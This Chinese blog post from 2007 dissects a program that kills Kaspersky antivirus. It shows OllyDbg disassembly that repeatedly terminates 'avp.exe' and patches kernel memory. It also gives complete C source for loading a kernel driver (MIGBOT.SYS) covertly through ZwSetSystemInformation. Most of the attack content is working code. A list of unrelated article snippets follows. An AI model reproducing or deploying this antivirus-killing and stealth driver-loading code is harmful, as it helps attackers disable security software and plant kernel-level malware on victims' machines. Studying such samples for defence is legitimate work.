iiprogram
iiprogram

ZWSETSYSTEMINFORMATION过卡巴

一段算是针对卡巴的程序
2007-07-08 22:06

OD代码:
0040130B    |.    68 54304000     push      00403054                           ; /Arg1 = 00403054 ASCII "avp.exe"
00401310    |.    E8 4FFEFFFF     call      00401164                           ; /结束卡巴.00401164
00401315    |.    A3 38304000     mov       dword ptr [403038], eax
0040131A    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401320    |.    6A 00           push      0                                  ; |Inheritable = FALSE
00401322    |.    6A 01           push      1                                  ; |Access = TERMINATE
00401324    |.    E8 2B010000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401329    |.    8BD8            mov       ebx, eax
0040132B    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
0040132D    |.    53              push      ebx                                ; |hProcess
0040132E    |.    E8 3F010000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
00401333    |.    53              push      ebx                                ; /hObject
00401334    |.    E8 FD000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
00401339    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
0040133E    |.    E8 29010000     call      <jmp.&kernel32.Sleep>              ; /Sleep
00401343    |.    68 5C304000     push      0040305C                           ; /Arg1 = 0040305C ASCII "avp.exe"
00401348    |.    E8 17FEFFFF     call      00401164                           ; /结束卡巴.00401164
0040134D    |.    A3 38304000     mov       dword ptr [403038], eax
00401352    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401358    |.    6A 00           push      0                                  ; |Inheritable = FALSE
0040135A    |.    6A 01           push      1                                  ; |Access = TERMINATE
0040135C    |.    E8 F3000000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401361    |.    8BD8            mov       ebx, eax
00401363    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
00401365    |.    53              push      ebx                                ; |hProcess
00401366    |.    E8 07010000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
0040136B    |.    53              push      ebx                                ; /hObject
0040136C    |.    E8 C5000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
00401371    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
00401376    |.    E8 F1000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
0040137B    |.    68 64304000     push      00403064                           ; /Arg1 = 00403064 ASCII "avp.exe"
00401380    |.    E8 DFFDFFFF     call      00401164                           ; /结束卡巴.00401164
00401385    |.    A3 38304000     mov       dword ptr [403038], eax
0040138A    |.    FF35 38304000 push      dword ptr [403038]                 ; /ProcessId = 0
00401390    |.    6A 00           push      0                                  ; |Inheritable = FALSE
00401392    |.    6A 01           push      1                                  ; |Access = TERMINATE
00401394    |.    E8 BB000000     call      <jmp.&kernel32.OpenProcess>        ; /OpenProcess
00401399    |.    8BD8            mov       ebx, eax
0040139B    |.    6A FF           push      -1                                 ; /ExitCode = FFFFFFFF (-1.)
0040139D    |.    53              push      ebx                                ; |hProcess
0040139E    |.    E8 CF000000     call      <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
004013A3    |.    53              push      ebx                                ; /hObject
004013A4    |.    E8 8D000000     call      <jmp.&kernel32.CloseHandle>        ; /CloseHandle
004013A9    |.    68 C8000000     push      0C8                                ; /Timeout = 200. ms
004013AE    |.    E8 B9000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
004013B3    |.    5F              pop       edi
004013B4    |.    5E              pop       esi
004013B5    |.    5B              pop       ebx
004013B6    /.    C3              retn
004013B7 >/$    6A 01           push      1                                  ; /ShowState = SW_SHOWNORMAL
004013B9    |.    68 6C304000     push      0040306C                           ; |CmdLine = "Call.dat"
004013BE    |.    E8 C1000000     call      <jmp.&kernel32.WinExec>            ; /WinExec
004013C3    |.    E8 75FEFFFF     call      0040123D
004013C8    |.    0BC0            or        eax, eax
004013CA    |.    74 62           je        short 0040142E
004013CC    |.    A3 09304000     mov       dword ptr [403009], eax
004013D1    |.    FF1D 3C304000 call      far fword ptr [40303C]
004013D7    |.    8BC4            mov       eax, esp
004013D9    |.    8B6424 04       mov       esp, dword ptr [esp+4]
004013DD    |.    50              push      eax
004013DE    |.    A1 09304000     mov       eax, dword ptr [403009]
004013E3    |.    C680 B1B70100>mov       byte ptr [eax+1B7B1], 0EB
004013EA    |.    C680 86CA0100>mov       byte ptr [eax+1CA86], 0EB
004013F1    |.    5C              pop       esp
004013F2    |.    68 F8134000     push      004013F8
004013F7    |.    CB              retf                                       ;    RET 用作跳转到 004013F8
004013F8    |>    6A 00           push      0                                  ; /pModule = NULL
004013FA    |.    E8 4F000000     call      <jmp.&kernel32.GetModuleHandleA> ; /GetModuleHandleA
004013FF    |.    A3 78304000     mov       dword ptr [403078], eax
00401404    |.    68 D0070000     push      7D0                                ; /Timeout = 2000. ms
00401409    |.    E8 5E000000     call      <jmp.&kernel32.Sleep>              ; /Sleep
0040140E    |.    E8 F5FEFFFF     call      00401308
00401413    |.    E8 F0FEFFFF     call      00401308
00401418    |.    E8 EBFEFFFF     call      00401308
0040141D    |.    6A 0A           push      0A                                 ; /Arg4 = 0000000A
0040141F    |.    6A 00           push      0                                  ; |Arg3 = 00000000
00401421    |.    6A 00           push      0                                  ; |Arg2 = 00000000
00401423    |.    FF35 78304000 push      dword ptr [403078]                 ; |Arg1 = 00000000
00401429    |.    E8 D2FBFFFF     call      00401000                           ; /结束卡巴.00401000
0040142E    |>    6A 00           push      0                                  ; /ExitCode = 0
00401430    /.    E8 0D000000     call      <jmp.&kernel32.ExitProcess>        ; /ExitProcess

而Call.dat通过ZwSetSystemInformation(这种方法用的不太多吧)加载驱动C:/MIGBOT.SYS
在邪八找到了一段代码,又学到东西了:

#include <windows.h>
#include <stdio.h>
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define SystemLoadAndCallImage 38

typedef struct _UNICODE_STRING {
      USHORT Length;
      USHORT MaximumLength;
      PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef unsigned long NTSTATUS;

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
      UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;

int main(int argc, char *argv[])
{
      SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
      UNICODE_STRING TmpBuff;
      char      szDrvFullPath[256],szTmp[256];
      int iBuffLen;
    
      printf("Load driver with ZwSetSystemInformation( )/r/n");
      printf("Date: 8th May 2007/r/n");
      printf("Modifed by: GaRY <wofeiwo_at_gmail_dot_com>/r/n/r/n");
      if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
      {
          printf("Usage: %s <DriverPath>/r/n", argv[0]);
          exit(-1);
      }

      // 从ntll.dll获取函数
      if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"),    "RtlInitUnicodeString" )) )  
      {
          printf( "GetProcAddress(/"RtlInitUnicodeString/") Error:%d/n", GetLastError() );
          exit(1);
      }
      if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
      {
          printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
          exit(1);
      }
      if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
      {
          printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
          exit(1);
      }

      GetFullPathName(argv[1], 256, szTmp, NULL);  
      printf("Loading driver: %s/r/n", szTmp);
      iBuffLen = sprintf(szDrvFullPath, "//??//%s", szTmp);
      szDrvFullPath[iBuffLen]=0;
      TmpBuff.Buffer = (PVOID)szDrvFullPath;
      TmpBuff.Length = iBuffLen;
      RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);

      if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))      //加载进内核空间
      {
          printf("Driver: %s loaded./r/n", szDrvFullPath);
      }
      else
      {
          printf("Driver: %s not loaded./r/n", szDrvFullPath);
      }
      return true;
}

 

你可能感兴趣的:(ZWSETSYSTEMINFORMATION过卡巴)

  • 腾讯社招前端面经(成都)
    本人经验是1.8年,拉钩投递,分享面经用于学习,大家可供参考~面试流程电话面同事面组长面部长面电话面首先会接到一个面试官的电话,问一些简单的问题,简单确认是否水平真实,没有录音,记不到什么了~过了才有线下面试机会(网上说这个只是来简单判断简历是否有水分,所以如果经历正常下能过滴~)。自我介绍上家公司业务、规模项目中遇到的最大挑战react与vue的区别离职原因同事面电话面过了的话,差不多三个工作日
  • 极限与配合 念致达 互换性与技术测量机电专业必修课程
    极限与配合术语及概念公称尺寸(基本尺寸)实际尺寸极限尺寸实际偏差极限偏差尺寸公差(Th,Ts)尺寸公差带图配合间隙与过盈配合的种类1.间隙配合2.过盈配合3.过渡配合配合公差(T~f~)公差与配合国家标准标准公差系列公差单位:公差等级基本偏差系列基本偏差基本偏差代号孔轴公差带代号、公差带标注、配合代号公差带代号公差带表示配合代号术语及概念公称尺寸(基本尺寸)设计时给定的尺寸符号:孔(D)轴(d)实
  • 【北上广深杭大厂编程面试题】C++篇...这里介绍C++是如何实现多态的?(三) 努力毕业的小土博^_^ 计算机基础知识和编程c++面试java开发语言职场和发展
    【北上广深杭大厂编程面试题】C++篇…这里介绍C++是如何实现多态的?(三)【北上广深杭大厂编程面试题】C++篇…这里介绍C++是如何实现多态的?(三)文章目录【北上广深杭大厂编程面试题】C++篇...这里介绍C++是如何实现多态的?(三)前言3.纯虚函数与抽象类示例代码:纯虚函数与抽象类输出:4.虚函数的动态绑定与vtablevtable工作原理:总结欢迎铁子们点赞、关注、收藏!祝大家逢考必过!
  • 智能汽车数据堡垒:HSM固件签名如何阻断车载系统0day漏洞? 安 当 加 密 汽车车载系统网络
    2023年某车企30万辆智能汽车因OTA漏洞遭远程劫持——当黑客用CAN总线注入恶意固件,安当HSM硬件加密机以签名技术构筑车载系统的“最后一道防火墙”。一、智能汽车安全危局:0day漏洞为何成为致命威胁?车载系统漏洞攻防数据(2024)攻击类型占比技术手段典型后果OTA固件劫持42%仿冒升级包注入后门远程操控刹车/转向系统ECU恶意刷写31%通过OBD-II接口刷入破坏性固件动力电池过充起火车云
  • 常见排序方法大全 实相无相 算法排序算法数据结构
    这篇文章主要讨论各种常见的排序算法,包括冒泡排序、插入排序、选择排序、快速排序、堆排序、希尔排序、归并排序、基数排序等。每种排序算法都有它自己的特点。本文将对这些算法的工作原理、特点、时间复杂度等方面进行介绍,并且给出实现示例。一:基本定义冒泡排序(BubbleSort):是一种简单的排序算法,它重复地走访过要排序的数列,一次比较两个元素,如果它们的顺序错误就把它们交换过来。插入排序(Insert
  • 腾讯云产品都有哪些 苹果企业签名分发 腾讯云
    之前我已经系统分析过腾讯云的未来方向,现在需要转向产品架构的实用性介绍。要注意避免简单罗列,而是按用户使用场景分层展开——毕竟直接扔出200+产品名称只会让人眼花缭乱。用户没限定细分领域,所以得覆盖主流服务:先从基础计算存储网络讲起,这是上云刚需;再提PaaS层关键服务如数据库和容器,这是技术选型重点;最后补充音视频、AI等腾讯特色产品,呼应之前提到的战略方向。政企客户可能还关心专有云方案,要单独
  • 【高频考点精讲】前端动画库对比:GSAP、Anime.js和Motion One选型 全栈老李技术面试 前端高频考点精讲前端javascripthtmlcss面试题reactvue
    前端动画库三剑客:GSAP、Anime.js和MotionOne选型指南‍作者:全栈老李更新时间:2025年5月‍适合人群:前端初学者、进阶开发者版权:本文由全栈老李原创,转载请注明出处。今天咱们聊聊前端动画库这个事儿。作为"全栈老李",我在项目里用过不少动画库,踩过坑也尝过甜头。现在市面上动画库五花八门,但真正能打的就那几个。今天重点说说GSAP、Anime.js和MotionOne这三个,帮你
  • 网络安全相关专业就业,零基础入门到精通,看这一篇分析就够了
    对于就业环境来说,都说不好,但我分析下来,其实网络安全专业还是有很多选择或出路的。有不少部门,可能很多人没有之前都没有听说过,平时也没有关注这块的招聘或者考编信息。今天,统一整理一下,方便大家获取。1、政府部门与事业单位在政府部门与事业单位中,网络安全专业毕业生有多个选择:公安局、网信办等部门:虽然工作压力较大,但待遇优厚且有编制保障。省直、市直单位信息中心:性价比高且有编制保障,是一个稳定且不错
  • Stable Diffusion 项目实战落地:从0到1 掌握ControlNet:打造光影字形的创意秘技 第一篇 w风雨无阻w AI应用实践stablediffusionAI作画人工智能ai绘画AIGC
    大家好呀,欢迎来到AI造字工坊!在这篇文章中,我们将带领你走进一个神奇的世界——ControlNet。你可能听说过它,但可能还没摸清它的深奥之处。今天,我们就来揭开它神秘的面纱,轻松带你玩转字形设计!话说回来,相信大家对图片生成、提示词、放大操作、抽卡这些基本操作已经不陌生了吧?从最初的“小白”,到如今的“AI图片小达人”,我们已经走过了不少路程。但今天,不同于以前的步骤,我们要接触到一个更加强大
  • java 学习 底层代码 算法 好学且牛逼的马 java
    #33写算法题黑马的视频争取简单的过一遍要考试啦密码的写底层代码秘密的底层代码有点长啊看不懂难找了几个视频课看看吧想看中文版jdkapi吧算了慢慢看先把几个顶级父类给看会了objectsystemstringstringbuilder算法单路递归packagecom.itheima.Recursion;​publicclasssingleRecursion{  publicstaticvoidma
  • 假设你正在爬楼梯。需要 n 阶你才能到达楼顶。每次你可以爬 1 或 2 个台阶。你有多少种不同的方法可以爬到楼顶呢? Lowjin_ leetCode算法练习算法c++学习笔记
    示例1:输入:n=2输出:2解释:有两种方法可以爬到楼顶。1.1阶+1阶2.2阶示例2:输入:n=3输出:3解释:有三种方法可以爬到楼顶。1.1阶+1阶+1阶2.1阶+2阶3.2阶+1阶提示:1<=n<=45本题大家如果没有接触过的话,会感觉比较难,多举几个例子,就可以发现其规律。爬到第一层楼梯有一种方法,爬到二层楼梯有两种方法。那么第一层楼梯再跨两步就到第三层,第二层楼梯再跨一步就到第三层。所以
  • 数组中重复的数字-数据结构 hixiaoyang python开发语言
    问题描述在一个长度为n的数组里,所有数字都在0~n-1的范围内。数组中某些数字是重复的,但不知道有几个数字重复了,也不知道每个数字重复了几次。请找出数组中任意一个重复的数字。关键要求:时间复杂度O(n),空间复杂度O(1)解题思路方法一:哈希表法(不符合空间要求但容易理解)使用哈希表存储已经遍历过的数字,当遇到重复数字时返回。时间复杂度:O(n)空间复杂度:O(n)方法二:原地交换法(最优解)利用
  • Flutter (Retrofit + Dio) - 3 - Retrofit方式使用dio 梨花炖海棠 flutterflutter
    建议先将Flutter官方文档过一遍,本系列教程FlutterSDK>=3.10.0考虑篇幅长度,这里将分成几片文章创建实体类封装dioRetrofit方式使用dio一、创建基础请求APIlib/api/douyin.dartimport'package:dio/dio.dart';import'package:lhdht_flutter_app/model/request/douyin_user
  • Leetcode百题斩-二叉树 Owen_Q 递归搜索水题leetcode算法职场和发展
    二叉树作为经典面试系列,那么当然要来看看。总计14道题,包含大量的简单题,说明这确实是个比较基础的专题。快速过快速过。先构造一个二叉树数据结构。publicclassTreeNode{intval;TreeNodeleft;TreeNoderight;TreeNode(){}TreeNode(intval){this.val=val;}TreeNode(intval,TreeNodeleft,Tr
  • 2015 United Kingdom and Ireland Programming Contest (UKIEPC 2015) Owen_Q 数学字符串模拟
    2015年的icpc英国站,不到一百只过题队伍,可以算是icpc在英国刚起步的时候。ProblemBMountainBiking思路:作为本场的签到题,读懂题意之后,这题倒是更像一道数学题。给定n个坡面的角度,求解到达坡道底端的速度利用经典力学动力学公式即可直接求出./*AuthorOwen_Q*/#includeusingnamespacestd;typedeflonglongll;consti
  • c++STL库与快速排序 浪子小院 基础精讲c++算法开发语言数据结构
    什么是STL库STL=StandardTemplateLibrary,标准模板库,是一系列软件的统称。从根本上说,STL是一些“容器”的集合,这些“容器”有list,vector,set,map等,STL也是算法和其他一些组件的集合。前面已经学习过的中sort函数、中string类都是STL的内容。STL库还有很多内容,比如:向量(vector)、栈(stack)、队列(queue)、优先队列(p
  • Centos7.9+mysql8.0开启指定IP远程连接数据库 洋滔 服务器数据库tcp/ipmysql
    公司服务器换了,需要重新搭建下web环境,在配置mysql远程连接的时候碰到了几个坑,之前也配置过,但这次由于mysql版本的不同,配置方法稍微不同,这里做个记录。首先是,创建mysql用户,命令如下CREATEUSER'jkxtc178'@'215.55.284.149';@‘IP’,如果你不想指定ip访问,使用%即可,下边的命令出现@'IP’的都是这样。然后是设置用户登陆密码:ALTERUSE
  • 使用CSS @layer控制样式优先级的新方式 海派程序猿 css前端
    CSS@layer:拯救你的样式优先级,告别“!important”的焦虑各位前端同僚们,你们有没有经历过这样的噩梦?深夜,正当你准备结束一天的工作,舒舒服服地躺在床上刷手机时,测试突然甩来一个bug:一个看起来简单的样式问题,却怎么改都改不过来!你瞪大了眼睛,一行一行地检查CSS,发现优先级简直乱成了一锅粥。仿佛无数个小恶魔在你代码里跳舞,疯狂地嘲笑你的努力。最后,你无奈地祭出了“!import
  • 前端用MQTT协议通信的场景和好处 CreatorRay 前端网络面试前端MQTT网络协议物联网
    上家公司中前端项目有用MQTT协议和硬件通信的场景,虽然很早就听说过MQTT协议,但是这是第一次在前端项目里基于MQTT协议做网络通信。当时没了解太多,工作中只做好了代码层面的工作,并没有深入了解MQTT协议的好处和适合的应用场景。在前端项目中,应该99%的情况都会基于HTTP和WebSocket来进行网络通信,使用MQTT在前端里确实比较小众。目前可能只会在物联网项目中,需要跟硬件通信的前提下,
  • 游戏寻路之A*算法(GUI演示) jforgame 从零开始搭建游戏服务器框架javaA星自动寻路
    一、A*算法介绍A*算法是一种路径搜索算法,用于在图形网络中找到最短路径。它结合了Dijkstra算法和启发式搜索的思想,通过综合利用已知的最短路径和估计的最短路径来优化搜索过程。在游戏自动寻路得到广泛应用。二、A*算法的基本思想在图形网络中选择一个起点和终点。维护两个列表:开放列表和关闭列表。开放列表用于存储待考虑的节点,关闭列表用于存储已考虑过的节点。将起点加入开放列表。循环以下工作当open
  • Python3获取5000个元素的单字符表 DechinPhy
    技术背景此前考虑过一个问题,有没有办法获取到python里面所有定义好的单字符的表,比如我们获取5000个不一样的单字符,但是常用的chr(number)的方法里面包含了太多的非字母条目,比如缩进换行符等,也会被识别为长度为1的符号。因此需要在此基础上加一个isalpha()的判断。输出5000个字符示例先解释一下思路,我们还是遍历chr中所包含的字符,此时得到的是所有的长度为1的字符,再用str
  • Three.js + Vue 处理glb文件过大问题(DRACOLoader加载压缩glb) printf_824 vuethreejavascriptvue.js前端
    起因,three.jsediter导出的glb文件过于庞大,导致部署后文件加载过久解决方法:第一步(得有个blender),压缩:导出时把压缩勾选上这时候我们会得到一个glb文件,但与three.jsediter导出不同的的是,这个文件引入代码中会报如下错误这个警告表明在使用THREE.GLTFLoader时,没有提供DRACOLoader实例。DRACOLoader是用于加载Draco压缩格式的
  • JavaIO四大模型:NIO(IO多路复用) Colourful. Java网络编程java网络
    文章目录概述NIO涉及到的名词JavaNIO服务端和客户端流程概述Java中的Selector和Linux中的epoll都是基友IO多路复用的,有时也被称为异步阻塞IO。我们之前介绍过,同步阻塞I/O和同步非阻塞IO。对于同步阻塞I/O来说,每次进行I/O时,我们的用户线程都会阻塞,显然这在高并发下效率很低。对于同步非阻塞I/O来说,每次进行I/O,虽然在内核缓冲区还没有数据的情况下,会给用户线程
  • 后端开发实习生简历迭代的5个版本,希望能帮你找到实习 今天不coding 简历实习后端Java大厂暑期实习
    后端开发实习生简历迭代的5个版本,希望能帮你找到实习1.0研究生开学时写的第一份简历,主要是对本科做的项目的一些总结。本科主要是以深度学习的项目为主+比赛,开发的技术学的比较少,后端的项目也没有做过。但是凭此找到了一份算法的实习。当时研一还是想走算法工程师的。后面觉得自己不适合,就放弃了。2.0经历过几个月的算法实习和论文折磨之后,决定走后端开发岗了,选择Java为主语言,在B站大学做了一个项目,
  • Java四种拷贝方式总结!一文扫清所有拷贝问题 小W求学之旅 javaspring拷贝大文件拷贝
    作为Java开发者,日常开发中经常会遇到数据拷贝的需求。最近在面试中也有被问到一次大文件拷贝,抽空专门总结一下,从基础概念到实战技巧,配合流程图,让原理和流程一目了然~一、浅拷贝VS深拷贝一开始做spring项目时,就被浅拷贝坑过。当时想复制一个对象,结果改了新对象的属性,老对象也跟着变了。后来才知道,这就是浅拷贝的“锅”。浅拷贝就像拍证件照,照片上的人看着和你一模一样,但本质上还是两张纸。Jav
  • App Store暗藏虚假抖音,内含间谍软件窃取照片和加密货币 FreeBuf- TikTokAppStoreiOSAndroid
    卡巴斯基网络安全研究人员近日发现名为SparkKitty的新型间谍软件活动,该恶意程序已感染苹果AppStore和谷歌Play官方商店的多个应用。这款间谍软件旨在窃取用户移动设备中的所有图片,疑似专门搜寻加密货币相关信息。该攻击活动自2024年初开始活跃,主要针对东南亚和中国用户。伪装流行应用渗透设备SparkKitty间谍软件通过看似无害的应用程序渗透设备,通常伪装成TikTok等流行应用的修改
  • 亚马逊广告曝光量高却无点击量的深层逻辑思考 观察猿 python人工智能
    在亚马逊这个全球最大的电商竞技场中,广告投放早已成为卖家突围的必争之地。然而,当无数卖家反复纠结"亚马逊广告竞价设置多少合适"这一问题时,背后折射出的其实是整个行业面临的系统性难题。作为从业多年的广告优化师,我见证过太多卖家在手动调价、关键词管理和预算分配中疲于奔命,最终陷入"高投入低回报"的恶性循环。核心痛点往往集中在三个维度:竞价策略缺乏动态响应能力,关键词管理跟不上市场变化节奏,预算分配与库
  • DeepBI如何用AI竞价破解亚马逊广告ACOS困局 扬帆起航13 人工智能
    在亚马逊这个全球最大的电商竞技场中,广告投放早已成为卖家突围的必争之地。然而,当无数卖家反复纠结"亚马逊广告竞价设置多少合适"这一问题时,背后折射出的其实是整个行业面临的系统性难题。作为从业多年的广告优化师,我见证过太多卖家在手动调价、关键词管理和预算分配中疲于奔命,最终陷入"高投入低回报"的恶性循环。核心痛点往往集中在三个维度:竞价策略缺乏动态响应能力,关键词管理跟不上市场变化节奏,预算分配与库
  • 2025教育科技新观察:Python构建科普知识互动平台 助力多学科融合教学 Bryan Ding python科技pygame
    当代码的河流漫过传统教育的堤岸,一座由Python浇筑的知识桥梁正悄然架起。这座桥梁上,行星轨道化作指尖跃动的音符,DNA双螺旋成为旋转的密码锁,历史的尘埃在虚拟时空中重新排列组合——科普教育从未如此贴近生命的脉动。模块化架构:知识迷宫的基石这座数字城堡的基石,是Python铸就的模块化技术骨架。Pygame库如同精密的齿轮组,将万有引力公式转化为天体运行的芭蕾舞步。在某个天文科普平台中,学生轻触
  • 深入理解API全称:从基本概念到AI绘画接入实战 UI罐头 人工智能
    你有没有注意过,现在很多App和小程序动不动就能“智能识别”“一键生成”?比如发个自拍,就能自动P图成二次元,或者输入几句话,就能生成一幅完整的画作。听起来像魔法,背后其实是技术的逻辑,而这套逻辑的核心,就是一个常被提起却不太好懂的词——API。API全称是“ApplicationProgrammingInterface”,中文叫“应用程序编程接口”,说白了就是程序和程序之间“打交道”的桥梁。看似
  • JAVA中的Enum 周凡杨 javaenum枚举
    Enum是计算机编程语言中的一种数据类型---枚举类型。 在实际问题中,有些变量的取值被限定在一个有限的范围内。     例如,一个星期内只有七天 我们通常这样实现上面的定义: public String monday; public String tuesday; public String wensday; public String thursday
  • 赶集网mysql开发36条军规 Bill_chen mysql业务架构设计mysql调优mysql性能优化
    (一)核心军规 (1)不在数据库做运算    cpu计算务必移至业务层; (2)控制单表数据量    int型不超过1000w,含char则不超过500w;    合理分表;    限制单库表数量在300以内; (3)控制列数量    字段少而精,字段数建议在20以内
  • Shell test命令 daizj shell字符串test数字文件比较
    Shell test命令 Shell中的 test 命令用于检查某个条件是否成立,它可以进行数值、字符和文件三个方面的测试。 数值测试 参数 说明 -eq 等于则为真 -ne 不等于则为真 -gt 大于则为真 -ge 大于等于则为真 -lt 小于则为真 -le 小于等于则为真 实例演示: num1=100 num2=100if test $[num1]
  • XFire框架实现WebService(二) 周凡杨 javawebservice
       有了XFire框架实现WebService(一),就可以继续开发WebService的简单应用。 Webservice的服务端(WEB工程): 两个java bean类: Course.java    package cn.com.bean; public class Course {     private
  • 重绘之画图板 朱辉辉33 画图板
           上次博客讲的五子棋重绘比较简单,因为只要在重写系统重绘方法paint()时加入棋盘和棋子的绘制。这次我想说说画图板的重绘。        画图板重绘难在需要重绘的类型很多,比如说里面有矩形,园,直线之类的,所以我们要想办法将里面的图形加入一个队列中,这样在重绘时就
  • Java的IO流 西蜀石兰 java
    刚学Java的IO流时,被各种inputStream流弄的很迷糊,看老罗视频时说想象成插在文件上的一根管道,当初听时觉得自己很明白,可到自己用时,有不知道怎么代码了。。。 每当遇到这种问题时,我习惯性的从头开始理逻辑,会问自己一些很简单的问题,把这些简单的问题想明白了,再看代码时才不会迷糊。 IO流作用是什么? 答:实现对文件的读写,这里的文件是广义的; Java如何实现程序到文件
  • No matching PlatformTransactionManager bean found for qualifier 'add' - neither 林鹤霄
    java.lang.IllegalStateException: No matching PlatformTransactionManager bean found for qualifier 'add' - neither qualifier match nor bean name match!   网上找了好多的资料没能解决,后来发现:项目中使用的是xml配置的方式配置事务,但是
  • Row size too large (> 8126). Changing some columns to TEXT or BLOB aigo column
    原文:http://stackoverflow.com/questions/15585602/change-limit-for-mysql-row-size-too-large   异常信息: Row size too large (> 8126). Changing some columns to TEXT or BLOB or using ROW_FORMAT=DYNAM
  • JS 格式化时间 alxw4616 JavaScript
    /** * 格式化时间 2013/6/13 by 半仙 [email protected] * 需要 pad 函数 * 接收可用的时间值. * 返回替换时间占位符后的字符串 * * 时间占位符:年 Y 月 M 日 D 小时 h 分 m 秒 s 重复次数表示占位数 * 如 YYYY 4占4位 YY 占2位<p></p> * MM DD hh mm
  • 队列中数据的移除问题 百合不是茶 队列移除
         队列的移除一般都是使用的remov();都可以移除的,但是在昨天做线程移除的时候出现了点问题,没有将遍历出来的全部移除,  代码如下;      // package com.Thread0715.com; import java.util.ArrayList; public class Threa
  • Runnable接口使用实例 bijian1013 javathreadRunnablejava多线程
    Runnable接口 a.       该接口只有一个方法:public void run(); b.       实现该接口的类必须覆盖该run方法 c.       实现了Runnable接口的类并不具有任何天
  • oracle里的extend详解 bijian1013 oracle数据库extend
    扩展已知的数组空间,例: DECLARE TYPE CourseList IS TABLE OF VARCHAR2(10); courses CourseList; BEGIN -- 初始化数组元素,大小为3 courses := CourseList('Biol 4412 ', 'Psyc 3112 ', 'Anth 3001 '); --
  • 【httpclient】httpclient发送表单POST请求 bit1129 httpclient
    浏览器Form Post请求 浏览器可以通过提交表单的方式向服务器发起POST请求,这种形式的POST请求不同于一般的POST请求 1. 一般的POST请求,将请求数据放置于请求体中,服务器端以二进制流的方式读取数据,HttpServletRequest.getInputStream()。这种方式的请求可以处理任意数据形式的POST请求,比如请求数据是字符串或者是二进制数据 2. Form
  • 【Hive十三】Hive读写Avro格式的数据 bit1129 hive
     1. 原始数据 hive> select * from word; OK 1 MSN 10 QQ 100 Gtalk 1000 Skype      2. 创建avro格式的数据表   hive> CREATE TABLE avro_table(age INT, name STRING)STORE
  • nginx+lua+redis自动识别封解禁频繁访问IP ronin47
    在站点遇到攻击且无明显攻击特征,造成站点访问慢,nginx不断返回502等错误时,可利用nginx+lua+redis实现在指定的时间段 内,若单IP的请求量达到指定的数量后对该IP进行封禁,nginx返回403禁止访问。利用redis的expire命令设置封禁IP的过期时间达到在 指定的封禁时间后实行自动解封的目的。 一、安装环境: CentOS x64 release 6.4(Fin
  • java-二叉树的遍历-先序、中序、后序(递归和非递归)、层次遍历 bylijinnan java
    import java.util.LinkedList; import java.util.List; import java.util.Stack; public class BinTreeTraverse { //private int[] array={ 1, 2, 3, 4, 5, 6, 7, 8, 9 }; private int[] array={ 10,6,
  • Spring源码学习-XML 配置方式的IoC容器启动过程分析 bylijinnan javaspringIOC
    以FileSystemXmlApplicationContext为例,把Spring IoC容器的初始化流程走一遍: ApplicationContext context = new FileSystemXmlApplicationContext ("C:/Users/ZARA/workspace/HelloSpring/src/Beans.xml&q
  • [科研与项目]民营企业请慎重参与军事科技工程 comsci 企业
         军事科研工程和项目 并非要用最先进,最时髦的技术,而是要做到“万无一失”    而民营科技企业在搞科技创新工程的时候,往往考虑的是技术的先进性,而对先进技术带来的风险考虑得不够,在今天提倡军民融合发展的大环境下,这种“万无一失”和“时髦性”的矛盾会日益凸显。。。。。。所以请大家在参与任何重大的军事和政府项目之前,对
  • spring 定时器-两种方式 cuityang springquartz定时器
    方式一: 间隔一定时间 运行 <bean id="updateSessionIdTask" class="com.yang.iprms.common.UpdateSessionTask" autowire="byName" /> <bean id="updateSessionIdSchedule
  • 简述一下关于BroadView站点的相关设计 damoqiongqiu view
    终于弄上线了,累趴,戳这里http://www.broadview.com.cn   简述一下相关的技术点   前端:jQuery+BootStrap3.2+HandleBars,全站Ajax(貌似对SEO的影响很大啊!怎么破?),用Grunt对全部JS做了压缩处理,对部分JS和CSS做了合并(模块间存在很多依赖,全部合并比较繁琐,待完善)。   后端:U
  • 运维 PHP问题汇总 dcj3sjt126com windows2003
